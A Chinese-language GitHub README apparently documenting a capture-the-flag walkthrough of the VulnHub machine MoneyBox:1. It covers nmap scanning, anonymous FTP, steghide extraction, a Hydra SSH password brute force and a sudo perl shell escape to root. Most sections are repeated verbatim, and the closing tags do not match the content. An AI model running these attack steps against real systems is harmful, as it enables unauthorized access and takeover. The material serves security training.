YoganandhaNamana/MoneyBox-CTF-
GitHub: YoganandhaNamana/MoneyBox-CTF-
VulnHub Easy 级 Linux 靶机 MoneyBox:1 的渗透测试全流程实战教程文档,演示从侦察到提权的完整攻击链。
Stars: 0 | Forks: 0
# 💰 MoneyBox: 1 (VulnHub)




## 📖 概述
MoneyBox:1 是 VulnHub 上的一个 Easy 级别的 Linux Boot-to-Root 靶机,旨在练习以下内容:
- 枚举
- FTP 枚举
- 隐写术
- 密码破解
- SSH 访问
- Linux 提权
# 攻击路径
```
Host Discovery
│
▼
Nmap Enumeration
│
▼
Anonymous FTP Login
│
▼
Download Hidden Image
│
▼
Steghide
│
▼
Extract Hidden Password Hint
│
▼
Hydra Password Attack
│
▼
SSH Login
│
▼
sudo -l
│
▼
Perl Privilege Escalation
│
▼
ROOT
```
# 靶机信息
| 靶机 | MoneyBox:1 |
|----------|------------|
| 平台 | VulnHub |
| 难度 | Easy |
| 操作系统 | Linux |
| 类别 | Boot2Root |
# 使用的工具
- Netdiscover
- Nmap
- FTP
- ExifTool
- Steghide
- Hydra
- SSH
- DIRB
- Perl
# 枚举
## 主机发现
```
netdiscover
```
发现
```
192.168.1.7
```
## 端口扫描
```
nmap -sC -sV -O 192.168.1.7
```
发现
- FTP
- SSH
- HTTP
有趣的发现
```
Anonymous FTP Login Allowed
```
# FTP 枚举
```
ftp 192.168.1.7
```
登录
```
Username : anonymous
Password : anonymous
```
已下载
```
trytofind.jpg
```
# 文件分析
```
exiftool trytofind.jpg
```
在元数据中未发现任何有趣的内容。
# 隐写术
```
steghide extract -sf trytofind.jpg
```
已恢复
```
data.txt
```
内容揭示了用户 **renu** 的密码提示。
# 目录枚举
```
dirb http://192.168.1.7
```
有趣的目录
```
/blogs
```
# 密码攻击
```
hydra -l renu -P rockyou.txt ssh://192.168.1.7
```
成功恢复有效的 SSH 凭据。
# 初始访问
```
ssh renu@192.168.1.7
```
成功获取了一个用户 shell。
捕获了 user flag。
# 提权
```
sudo -l
```
发现
```
NOPASSWD:
/usr/bin/perl
```
利用
```
sudo perl -e 'exec "/bin/bash";'
```
成功将权限提升至 root。
# 学到的技能
✔ 网络枚举
✔ 服务枚举
✔ 匿名 FTP 枚举
✔ 隐写术
✔ 密码破解
✔ SSH 身份验证
✔ Linux 枚举
✔ Sudo 配置不当
✔ 权限提升
# MITRE ATT&CK
| 阶段 | 技术 |
|---------|-----------|
| 发现 | 主动扫描 |
| 凭据访问 | 密码猜测 |
| 初始访问 | 有效账户 |
| 权限提升 | 滥用提权控制机制 |
# 经验教训
- 匿名 FTP 可能会暴露敏感文件。
- 弱密码很容易被破解。
- 隐写术可以隐藏凭据。
- 配置不当的 sudo 权限会导致 root 权限被接管。
- 最小权限原则至关重要。
# 免责声明
此实战 walkthrough 是在隔离的实验环境中完成的,仅供教育目的使用。
未经授权,请勿在系统上使用这些技术。
## 端口扫描
```
nmap -sC -sV -O 192.168.1.7
```
发现
- FTP
- SSH
- HTTP
有趣的发现
```
Anonymous FTP Login Allowed
```
# FTP 枚举
```
ftp 192.168.1.7
```
登录
```
Username : anonymous
Password : anonymous
```
已下载
```
trytofind.jpg
```
# 文件分析
```
exiftool trytofind.jpg
```
在元数据中未发现任何有趣的内容。
# 隐写术
```
steghide extract -sf trytofind.jpg
```
已恢复
```
data.txt
```
内容揭示了用户 **renu** 的密码提示。
# 目录枚举
```
dirb http://192.168.1.7
```
有趣的目录
```
/blogs
```
# 密码攻击
```
hydra -l renu -P rockyou.txt ssh://192.168.1.7
```
成功恢复有效的 SSH 凭据。
# 初始访问
```
ssh renu@192.168.1.7
```
成功获取了一个用户 shell。
捕获了 user flag。
# 提权
```
sudo -l
```
发现
```
NOPASSWD:
/usr/bin/perl
```
利用
```
sudo perl -e 'exec "/bin/bash";'
```
成功将权限提升至 root。
# 学到的技能
✔ 网络枚举
✔ 服务枚举
✔ 匿名 FTP 枚举
✔ 隐写术
✔ 密码破解
✔ SSH 身份验证
✔ Linux 枚举
✔ Sudo 配置不当
✔ 权限提升
# MITRE ATT&CK
| 阶段 | 技术 |
|---------|-----------|
| 发现 | 主动扫描 |
| 凭据访问 | 密码猜测 |
| 初始访问 | 有效账户 |
| 权限提升 | 滥用提权控制机制 |
# 经验教训
- 匿名 FTP 可能会暴露敏感文件。
- 弱密码很容易被破解。
- 隐写术可以隐藏凭据。
- 配置不当的 sudo 权限会导致 root 权限被接管。
- 最小权限原则至关重要。
# 免责声明
此实战 walkthrough 是在隔离的实验环境中完成的,仅供教育目的使用。
未经授权,请勿在系统上使用这些技术。标签:CSV导出, CTI, DNS 反向解析, Facebook API, VulnHub, XXE攻击, 内存分配, 协议分析, 权限提升, 网络安全, 隐私保护, 靶机 writeup